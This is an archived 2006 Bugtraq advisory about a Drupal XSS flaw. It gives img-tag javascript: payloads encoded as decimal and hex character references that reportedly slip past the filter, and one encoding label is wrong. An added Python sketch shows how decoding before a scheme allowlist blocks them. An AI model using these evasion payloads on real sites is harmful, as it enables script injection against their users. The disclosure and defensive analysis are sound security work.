Bugtraq mailing list archives

Drupal all version xss cehennem.org
From: liz0 () bsdmail com
Date: 2 Jan 2006 10:45:25 -0000

Drupal all version xss
----------------------------------------------------
site:http://www.drupal.org

Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
--------------------------------------------------

img tag : on

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

Decimal Value: HTML (without semicolons) 

<img src=javascript:alert('XSS')>  = <img 
src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>
---------------------------------------------------------------------------------------------------------------------------------------------------------------
Decimal Value: HTML (with semicolons)

<img src=javascript:alert('XSS')>  = <img 
src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


---------------------------------------------------------------------------------------------------------------------------------------------------------------
example:
post message :<img src=javascript:alert('XSS')> not Vulnerable but <img 
src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> Vulnerable 

post message :<img src=javascript:alert('XSS')> not Vulnerable but <img 
src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 Vulnerable  

  
---------------------------------------------------------

Credit:Liz0ziM
mail:liz0 () bsdmail com
www.biyo.tk , www.cehennem.org

Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend

-----------------------------------------------------------
Source:

http://liz0zim.no-ip.org/drupal.txt

------------------------------------------------------------
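
Added example, not part of the original post and not Drupal's code: the post reports that the literal `javascript:` value is blocked while the same value written as numeric character references is not. The sketch below assumes a filter that matches on the raw text (`naive_is_safe`, hypothetical) and contrasts it with a check that decodes the attribute value first and then allowlists the URL scheme; the allowed schemes and the benign image URL are constructed for illustration.

```python
import html
import re

# Attribute values quoted in the post above.
PLAIN = "javascript:alert('XSS')"
DECIMAL = ("&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58"
           "&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41")
HEX = ("&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A"
       "&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29")

ALLOWED_SCHEMES = {"http", "https"}  # assumption: what an image src may use
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def naive_is_safe(value):
    """Hypothetical weak filter: looks for the literal scheme in raw input."""
    return "javascript:" not in value.lower()


def normalize(value):
    """Reduce an attribute value to what a browser would treat as the URL."""
    decoded = html.unescape(value)              # numeric refs, ';' optional
    decoded = re.sub(r"[\t\r\n]", "", decoded)  # removed by URL parsers
    return decoded.strip(_C0_AND_SPACE).lower()


def is_safe_url(value):
    """Allowlist check on the scheme of the normalized value."""
    url = normalize(value)
    match = _SCHEME.match(url)
    if match:
        return match.group(1) in ALLOWED_SCHEMES
    # No well-formed scheme: accept only if no ':' precedes the path.
    return ":" not in re.split(r"[/?#]", url, maxsplit=1)[0]


def report():
    """Return (naive verdict, allowlist verdict) for each sample."""
    samples = {"plain": PLAIN, "decimal": DECIMAL, "hex": HEX,
               # constructed benign URL
               "image": "http://www.drupal.org/files/logo.png"}
    return {name: (naive_is_safe(v), is_safe_url(v))
            for name, v in samples.items()}


if __name__ == "__main__":
    for name, (naive, strict) in report().items():
        print(f"{name:8} naive_ok={naive!s:5} allowlist_ok={strict}")
```

Both encoded forms pass the raw-text match and are rejected once the value is decoded before the scheme check.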


